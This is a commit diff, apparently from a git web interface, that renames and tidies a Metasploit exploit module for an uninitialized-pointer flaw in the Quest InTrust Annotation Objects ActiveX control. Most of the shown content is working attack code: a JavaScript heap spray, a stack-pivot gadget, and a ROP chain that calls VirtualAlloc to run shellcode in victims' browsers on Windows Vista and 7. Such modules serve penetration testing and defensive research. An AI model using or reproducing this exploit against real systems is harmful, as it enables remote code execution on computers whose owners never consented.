Module rename. Cleanup whitespace. Fix typos.
parent
14f85e406f
commit
0d739a1a51
|
@ -1,12 +1,8 @@
|
||||||
##
|
|
||||||
# $Id$
|
|
||||||
##
|
|
||||||
|
|
||||||
###
|
###
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
# Framework web site for more information on licensing and terms of use.
|
# Framework web site for more information on licensing and terms of use.
|
||||||
# http://metasploit.com/framework/
|
# http://metasploit.com/framework/
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super( update_info(info,
|
super( update_info(info,
|
||||||
'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
|
'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a uninitialized variable vulnerability in the
|
This module exploits an uninitialized variable vulnerability in the
|
||||||
Annotation Objects ActiveX component. The activeX component loads into memory without
|
Annotation Objects ActiveX component. The activeX component loads into memory without
|
||||||
opting into ALSR so this module exploits the vulnerability against windows Vista and
|
opting into ALSR so this module exploits the vulnerability against windows Vista and
|
||||||
Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX
|
Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
|
||||||
points to part of the rop chain in a heap chunk and the calculated call will hit the
|
points to part of the ROP chain in a heap chunk and the calculated call will hit the
|
||||||
pivot in a seperate heap chunk. This will take some time in the users browser.
|
pivot in a separate heap chunk. This will take some time in the users browser.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'rgod <rgod[at]autistici.org>', # initial discovery & poc
|
'rgod <rgod[at]autistici.org>', # initial discovery & poc
|
||||||
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
|
'mr_me <steventhomasseeley[at]gmail.com>' # msf module
|
||||||
],
|
],
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'OSVDB', '80662'],
|
[ 'OSVDB', '80662'],
|
||||||
[ 'BID', '52765'],
|
[ 'BID', '52765'],
|
||||||
[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
|
[ 'URL', 'http://www.exploit-db.com/exploits/18674/']
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'process',
|
'EXITFUNC' => 'process',
|
||||||
'InitialAutoRunScript' => 'migrate -f',
|
'InitialAutoRunScript' => 'migrate -f'
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
|
@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
|
|
||||||
|
|
||||||
# Re-generate the payload.
|
# Re-generate the payload.
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(cli)) == nil)
|
||||||
|
|
||||||
|
@ -141,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
memory = new Array();
|
memory = new Array();
|
||||||
for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
|
for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
|
||||||
}
|
}
|
||||||
|
|
||||||
function main(){
|
function main(){
|
||||||
heapspray();
|
heapspray();
|
||||||
#{obj_name}.Add(#{my_target.ret},1);
|
#{obj_name}.Add(#{my_target.ret},1);
|
||||||
|
@ -156,39 +150,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
junk,
|
junk,
|
||||||
junk,
|
junk,
|
||||||
junk,
|
junk,
|
||||||
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
|
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
|
||||||
].pack('V*')
|
].pack('V*')
|
||||||
|
|
||||||
rop_gadgets << [0x44015CEF].pack('V*') * 140 # padding of retn's
|
rop_gadgets << [0x44015CEF].pack('V*') * 140 # padding of retn's
|
||||||
|
|
||||||
rop_gadgets << [
|
rop_gadgets << [
|
||||||
0x44015CEF, # retn
|
0x44015CEF, # retn
|
||||||
0x44015CEF, # retn
|
0x44015CEF, # retn
|
||||||
0x44015CEF, # retn
|
0x44015CEF, # retn
|
||||||
0x44015cee, # pop edx ; retn
|
0x44015cee, # pop edx ; retn
|
||||||
0x4401a130, # ptr to &VirtualAlloc() (IAT)
|
0x4401a130, # ptr to &VirtualAlloc() (IAT)
|
||||||
0x44015ca4, # mov eax,[edx+4] ; retn
|
0x44015ca4, # mov eax,[edx+4] ; retn
|
||||||
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
|
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
|
||||||
junk, # filler (compensate)
|
junk, # filler (compensate)
|
||||||
0x440159bb, # pop ebp ; retn
|
0x440159bb, # pop ebp ; retn
|
||||||
junk, # filler (retn offset compensation)
|
junk, # filler (retn offset compensation)
|
||||||
junk, # filler (retn offset compensation)
|
junk, # filler (retn offset compensation)
|
||||||
junk, # filler (retn offset compensation)
|
junk, # filler (retn offset compensation)
|
||||||
junk, # filler (retn offset compensation)
|
junk, # filler (retn offset compensation)
|
||||||
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
|
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
|
||||||
0x440012c1, # push esp ; ret 08
|
0x440012c1, # push esp ; ret 08
|
||||||
0x44016264, # pop ebx ; retn
|
0x44016264, # pop ebx ; retn
|
||||||
0x00004000, # 0x00000001-> ebx
|
0x00004000, # 0x00000001-> ebx
|
||||||
0x44015cc9, # pop edx ; retn
|
0x44015cc9, # pop edx ; retn
|
||||||
0x00001000, # 0x00001000-> edx
|
0x00001000, # 0x00001000-> edx
|
||||||
0x44017664, # pop ecx ; retn
|
0x44017664, # pop ecx ; retn
|
||||||
0x00000040, # 0x00000040-> ecx
|
0x00000040, # 0x00000040-> ecx
|
||||||
0x44017bd8, # pop edi ; retn
|
0x44017bd8, # pop edi ; retn
|
||||||
0x44017ebe, # retn
|
0x44017ebe, # retn
|
||||||
0x4400bf25, # pop eax ; retn
|
0x4400bf25, # pop eax ; retn
|
||||||
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
|
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
|
||||||
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
|
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
|
||||||
0x90909090, # nops, do not change as it changes the offset
|
0x90909090, # nops, do not change as it changes the offset
|
||||||
0x90909090,
|
0x90909090,
|
||||||
0x90909090,
|
0x90909090,
|
||||||
0x90909090,
|
0x90909090,
|
||||||
|
@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
var data = payload;
|
var data = payload;
|
||||||
while(data.length < 100000) { data += data; }
|
while(data.length < 100000) { data += data; }
|
||||||
var onemeg = data.substr(0, 64*1024/2);
|
var onemeg = data.substr(0, 64*1024/2);
|
||||||
for (i=0; i<14; i++) {
|
|
||||||
onemeg += data.substr(0, 64*1024/2);
|
for (i=0; i<14; i++) {
|
||||||
}
|
onemeg += data.substr(0, 64*1024/2);
|
||||||
|
}
|
||||||
|
|
||||||
onemeg += data.substr(0, (64*1024/2)-(38/2));
|
onemeg += data.substr(0, (64*1024/2)-(38/2));
|
||||||
var block = new Array();
|
var block = new Array();
|
||||||
for (i=0; i<700; i++) {
|
|
||||||
block[i] = onemeg.substr(0, onemeg.length);
|
for (i=0; i<700; i++) {
|
||||||
}
|
block[i] = onemeg.substr(0, onemeg.length);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
function main(){
|
function main(){
|
||||||
heapspray();
|
heapspray();
|
||||||
#{obj_name}.Add(#{my_target.ret},1);
|
#{obj_name}.Add(#{my_target.ret},1);
|
||||||
|
@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
</html>
|
</html>
|
||||||
EOF
|
EOF
|
||||||
|
|
||||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
|
||||||
|
print_status("#{peer} Sending HTML...")
|
||||||
|
|
||||||
#Remove the extra tabs from content
|
#Remove the extra tabs from content
|
||||||
content = content.gsub(/^\t\t/, '')
|
content = content.gsub(/^\t\t/, '')
|
Loading…
Reference in New Issue